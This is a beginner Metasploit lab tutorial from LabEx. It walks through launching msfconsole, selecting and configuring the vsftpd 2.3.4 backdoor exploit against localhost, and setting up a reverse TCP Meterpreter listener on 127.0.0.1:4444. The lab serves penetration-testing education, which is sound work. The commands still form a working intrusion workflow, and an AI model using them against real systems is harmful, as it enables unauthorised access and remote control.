LabEx
Log InJoin Free

Kali Exploitation with Metasploit

Kali LinuxBeginner
Practice Now

Introduction

In this lab, you will learn the basics of penetration testing using Kali Linux within a controlled environment on the LabEx VM. The focus is on leveraging the powerful Metasploit Framework to identify vulnerabilities, configure payloads, execute exploits, and interact with compromised systems through a Meterpreter session. Designed for beginners, this lab guides you step by step through essential cybersecurity techniques in a safe and structured manner. When you open the terminal, you will be automatically connected to the Kali Linux container's shell, ready to start practicing without needing to manually start or enter the container.

Starting Metasploit Framework

In this first step, you will launch the Metasploit Framework, a key tool for penetration testing in Kali Linux. This step is essential as it sets up the environment for identifying and exploiting vulnerabilities in later steps.

When you open the terminal in the LabEx VM, you will be automatically connected to the Kali Linux container's shell. There is no need to manually start the container or enter the shell; the environment is already configured for you.

Before using Metasploit, you need to ensure it is installed in the Kali Linux container. First, update the package list by typing the following command in the terminal and pressing Enter:

apt update

Next, install the Metasploit Framework. This installation may take a few minutes, so please wait for it to complete.

apt install -y metasploit-framework

Once installed, start the Metasploit console by typing the following command and pressing Enter:

msfconsole

The first time you run this command, it might take a moment to initialize as it sets up the database and loads modules. You will see an ASCII art banner and a prompt similar to this when Metasploit starts:

Metasploit Framework
...
msf6 >

The msf6 > prompt indicates that you are now inside the Metasploit console, ready to interact with the framework. Do not exit the console, as you will use it in the next step to search for and select an exploit.

Searching and Selecting an Exploit

Now that you have started the Metasploit Framework, the next step is to search for and select an exploit. An exploit is a piece of code that takes advantage of a software vulnerability to cause unintended behavior, such as gaining unauthorized access.

Since you are already in the Metasploit console (with the msf6 > prompt), let's search for an exploit related to FTP (File Transfer Protocol), a common service that can have vulnerabilities. Type the following command and press Enter:

search ftp

This command lists exploits and auxiliary modules related to FTP. The output will show a table of matching modules.

Matching Modules
================

   ##  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor          2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
   1  auxiliary/scanner/ftp/ftp_version                              normal     No     FTP Version Scanner
   2  auxiliary/scanner/ftp/anonymous                                normal     No     FTP Anonymous Access Scanner
...

For this lab, we will use the vsftpd_234_backdoor exploit. To select it, use the use command followed by the exploit's name.

use exploit/unix/ftp/vsftpd_234_backdoor

After selecting the exploit, your prompt will change to include the exploit's name, indicating it is now the active module.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

To view detailed information about the selected exploit, including its options and requirements, type the info command.

info

The output provides details such as the platform, architecture, and available targets.

       Name: VSFTPD v2.3.4 Backdoor Command Execution
     Module: exploit/unix/ftp/vsftpd_234_backdoor
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-07-03

You have now successfully selected an exploit. In the next step, you will configure a payload for this exploit.

Note: Labby can not get the operation records in msf shell, the following steps will not be verified.

Configuring the Exploit and Payload

With the exploit selected, you now need to configure its options and set a payload. A payload is the code that will run on the target system after the exploit is successful. For this lab, you will configure an interactive command shell payload that allows you to execute commands on the target system.

Important: Before setting a payload, it's crucial to check which payloads are compatible with your selected exploit. Use the following command to see all compatible payloads:

show payloads

This will display a list of payloads that work with the vsftpd_234_backdoor exploit. You should see only one compatible payload: cmd/unix/interact.

First, set the payload. We will use the interactive command shell that is compatible with this exploit. The payload name cmd/unix/interact follows a specific structure: <architecture>/<platform>/<type>. Here, cmd indicates a command shell architecture, unix specifies the target platform, and interact means it will provide an interactive session.

set payload cmd/unix/interact

You will see a confirmation message.

payload => cmd/unix/interact

Next, you need to configure the exploit options. The RHOST (Remote Host) option specifies the IP address of the target machine. For this simulation, we will set it to 127.0.0.1.

set RHOST 127.0.0.1

Important Note: Unlike reverse shell payloads, the cmd/unix/interact payload does not require LHOST or LPORT settings. This payload establishes an interactive command session directly with the target.

To verify all the settings, use the show options command.

show options

This displays a table of options for the exploit. Check that RHOST is set correctly.

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    21               yes       The target port (TCP)

Your exploit and payload are now configured and ready for execution in the next step.

Executing the Exploit

Having configured the exploit and payload, you are now ready to execute it. The exploit command instructs Metasploit to launch the attack against the specified target (RHOST).

In your Metasploit console, simply type the following command and press Enter:

exploit

Metasploit will attempt to run the exploit. Since there is no actual vulnerable VSFTPD service running on 127.0.0.1 in this lab environment, the exploit will fail. This is expected and demonstrates the process of launching an attack.

The output will show that Metasploit attempted to connect to the target FTP service but failed because the service is not running:

[-] 127.0.0.1:21 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (127.0.0.1:21).
[*] Exploit completed, but no session was created.

Note: With the cmd/unix/interact payload, you would not see a reverse shell listener being started. Instead, this payload would attempt to establish a direct interactive command session with the target FTP service if it were vulnerable and accessible.

The message Exploit completed, but no session was created confirms the failure. In a successful scenario with a vulnerable VSFTPD service, this would establish an interactive command shell session, allowing you to execute commands directly on the target system. This step teaches you the fundamental command for launching an exploit, which is a core part of the penetration testing workflow.

Setting Up a Meterpreter Listener

In this final step, you will learn to set up a listener for a Meterpreter payload. Meterpreter is an advanced, feature-rich payload that provides an interactive shell on the target system. Instead of launching an exploit, you will use the exploit/multi/handler module to listen for incoming connections. This is useful when an exploit is delivered through other means (e.g., a malicious file) and you need to catch the reverse connection.

First, switch to the multi/handler module.

use exploit/multi/handler

Your prompt will change to reflect the new module.

msf6 exploit(multi/handler) >

Next, set a Meterpreter payload. We will use one designed for Linux systems. The payload name linux/x86/meterpreter/reverse_tcp follows a logical structure: <platform>/<architecture>/<type>/<protocol>. It specifies a Linux platform, x86 architecture, a Meterpreter payload type, and a reverse TCP connection protocol.

set payload linux/x86/meterpreter/reverse_tcp

Now, configure the listener options, LHOST and LPORT, just as you did before.

set LHOST 127.0.0.1

Note: You may see a warning message about binding to a loopback address. This is normal when using localhost (127.0.0.1) and can be safely ignored for this lab.

set LPORT 4444

Finally, start the listener using the exploit command.

exploit

Metasploit will start a listener on the specified IP and port, waiting for a Meterpreter session to connect.

[*] Started reverse TCP handler on 127.0.0.1:4444

The console will remain active, waiting for a connection. In a real scenario, if a target machine executed the corresponding Meterpreter payload, a session would be established here. Since no target will connect in this lab, you can stop the listener by pressing Ctrl + C.

To exit the Metasploit console, type exit and press Enter.

Summary

In this lab, you have learned the fundamental steps of penetration testing using Kali Linux and the Metasploit Framework. You started by launching Metasploit, searched for and selected an exploit, configured both the exploit and a reverse shell payload, and executed the attack in a simulated environment. You also learned how to set up a standalone listener for an advanced Meterpreter payload. These steps provide a practical introduction to the core workflow of identifying vulnerabilities, preparing payloads, and understanding the exploitation process. By following this structured approach, you have gained hands-on experience with essential cybersecurity tools and techniques.

Related Kali Linux Courses
Kali Linux for Beginners

Kali Linux for Beginners

cybersecuritykalilinux
Kali Server Exploitation in Action

Kali Server Exploitation in Action

cybersecuritykalilinux